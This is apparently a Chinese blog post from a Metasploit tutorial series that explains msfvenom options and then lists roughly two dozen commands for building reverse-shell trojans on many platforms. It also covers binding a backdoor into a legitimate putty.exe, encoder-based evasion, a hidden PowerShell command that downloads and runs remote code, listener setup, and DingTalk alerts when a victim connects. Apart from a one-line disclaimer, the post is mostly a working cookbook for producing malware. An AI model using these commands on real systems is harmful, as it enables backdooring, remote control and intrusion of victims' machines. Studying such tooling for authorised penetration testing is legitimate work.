生命在于学习——MSF初体验(三)

在这里插入图片描述
注意:本篇文章仅用于学习笔记记录与交流,不得用于其他违规用途。

一、Msfvenom介绍

msf自带的有对应各个平台生成木马的工具msfvenom,而且不需要进入msf控制台,直接在命令行输入命令即可。

二、Msfvenom参数介绍

1、-l

列出指定模块的所有可用资源 , 模块类型包括 : payloads, encoders, nops, platforms, archs, encrypt, formats, all

2、-p

指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的

比如想查看windows/meterpreter/reverse_tcp支持什么平台、哪些选项,可以使用

msfvenom -p windows/meterpreter/reverse_tcp --list-options

3、-f

指定输出格式 (使用 --list formats 来获取msf支持的输出格式列表)

msfvenom  --list formats

4、-e

指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload如果你想查看所有支持的编码类型 , 使用

msfvenom --list encoders

5、-a

指定payload的目标架构,例如x86 | x64 | x86_64如果你想查看所有支持的架构 , 使用

msfvenom --list archs

6、-o

指定创建好的payload的输出位置 , 没啥好说的

7、-b

设定规避字符集,指定需要过滤的坏字符例 , 一般是和生成shellcode搭配使用

8、-n

为payload预先指定一个NOP滑动长度

9、-s

设定有效攻击荷载的最大长度,就是文件大小

10、-i

指定payload的编码次数 , 后面接次数,表示编码的次数

11、-c

添加自己的shellcode , 需要自己编写shellcode

12、-x|-k

捆绑。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。

13、-v

指定一个自定义的变量,以确定输出格式

14、-t

从STDIN读取有效负载时等待的秒数(默认值为30,0表示禁用), 一般默认即可

15、-h

查看帮助信息 , 没啥好说的

三、Msfvenom生成实例

1、生成一个windows木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.159 LPORT=8804 -f exe -o /tmp/payload.exe

在这里插入图片描述

2、规避指定字符

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -b '\x00' -f exe -o shell.exe

-b 替换代码中会出现中断的字符

3、指定编码器

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -b 'x00' -e x86/shikata_ga_nai -f exe -o shell.exe

4、绑定后门到其他可执行程序上

msfvenom -p windows/meterpreter/reverse_http LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -x /tmp/putty.exe -k -f exe -o /tmp/puuty_bind.exe

5、Windows木马

msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o /tmp/back.exe

6、Linux木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf -o /tmp/shell.elf

7、Mac木马

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho -o shell.macho

8、Android木马

msfvenom -a x86 --platform android -p android/meterpreter/reverse_tcp LHOST=IP LPORT=8004 R> /tmppayload.apk

9、Powershell木马

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

10、PHP木马

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw -o shell.php

11、ASP木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -o shell.asp

12、ASPX木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx -o shell.aspx

13、JSP木马

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw -o shell

14、War木马

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war -o shell.war

15、nodejs木马

msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.js

16、Bash木马

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On>-f raw -o shell.sh

17、Perl木马

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw -o shell.pl

18、Python木马

msfvenom -p python/meterpreter_reverse_http LHOST=IP LPORT=7878 -f raw -o shell.py

19、ruby木马

msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb

20、lua木马

msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.lua

21、exe利用exec执行powershell

msfvenom -p windows/exec CMD="powershell.exe -nop -w hidden -c M.proxy=[Net.WebRequest]::GetSystemWebProxy();M.downloadstring('http://IP:8080/4WFjDXrGo7Mj');" -f exe -e x86/shikata_ga_nai -i 6 -o msf.exe

22、windows shellcode

msfvenom -p windows/meterpreter/reverse_http LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f c

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

23、linux shellcode

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

24、mac shellcode

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

四、MSF监听

当目标主机执行反弹木马后,会回连当前机器 ,需要设置端口监听

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.101.48 LPORT=8000 -f exe -o /tmp/payload.exe

msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost IP    # msf好像不支持监听本地ip , 变成0.0.0.0了
set lport 4444
run

五、MSF和钉钉联动

1、创建群

2、创建群机器人

在这里插入图片描述

3、复制webhook

在这里插入图片描述

4、msf中打开钉钉通知

5、测试

进入msf后

load -l
load session_notifier 
set_session_dingtalk_webhook https://oapi.dingtalk.com/robot/send?access_token=你的token
start_session_notifier

常规监听,run

在这里插入图片描述
如果msf放后台

apt install screen
screen -S msf                               # 创建一个screen
ctrl + a + d                                   # 回到主窗口
screen -ls                                      # 列出所有的screen
screen -x msf                               # 恢复之前离线的screen作业
screen -S 名字  -X quit                 #  kill掉一个screen

六、RC文件

如果你觉得每次 , 设置监听比较麻烦 , 你也可以将这些命令写进一个rc文件

cat handler.rc 

use exploit/multi/handler
set lhost 0.0.0.0
set lport 5656
set payload windows/meterpreter/reverse_tcp
run -j

msfconsole -r handler.rc

或者一条命令监听
handler -p windows/meterpreter/reverse_tcp -H IP -P 8899

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
MSF(Metasploit Framework)是一款强大的开源渗透测试工具,用于测试和评估计算机系统的安全性。学习MSF渗透工具有助于提高对网络安全的理解和技能。以下是一些学习MSF渗透工具的材料和方法: 1. 官方文档:Metasploit官方网站提供了完整的文档,包括用户指南、参考手册和教程。这些文档详细介绍了MSF的各个模块、命令、选项和使用方法。 2. 书籍:有一些书籍专门介绍了MSF的原理、用法和实例。例如《Metasploit: The Penetration Tester's Guide》,该书提供了深入的MSF知识,并帮助读者掌握渗透测试的技巧。 3. 在线教程:互联网上有许多免费的MSF教程和视频教程可供学习。通过这些教程,可以了解MSF的基本操作和常用技巧,并学习如何使用不同的模块和插件。 4. 实践演练:通过自己的实践和演练来学习MSF是非常重要的。可以使用虚拟机环境搭建实验环境,模拟真实的渗透测试场景,并运用MSF进行实际的渗透测试工作。 5. 社区和论坛:Metasploit拥有活跃的社区和论坛,可以与其他渗透测试者交流经验和学习心得。在这些社区中,可以获取到最新的MSF资讯、漏洞信息和实践技巧。 需要注意的是,渗透测试是一项敏感和专业的工作,必须遵守法律和道德准则。在学习和使用MSF工具时,务必要了解和遵守相关的法律法规,避免非法使用和侵犯他人的隐私和安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

易水哲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值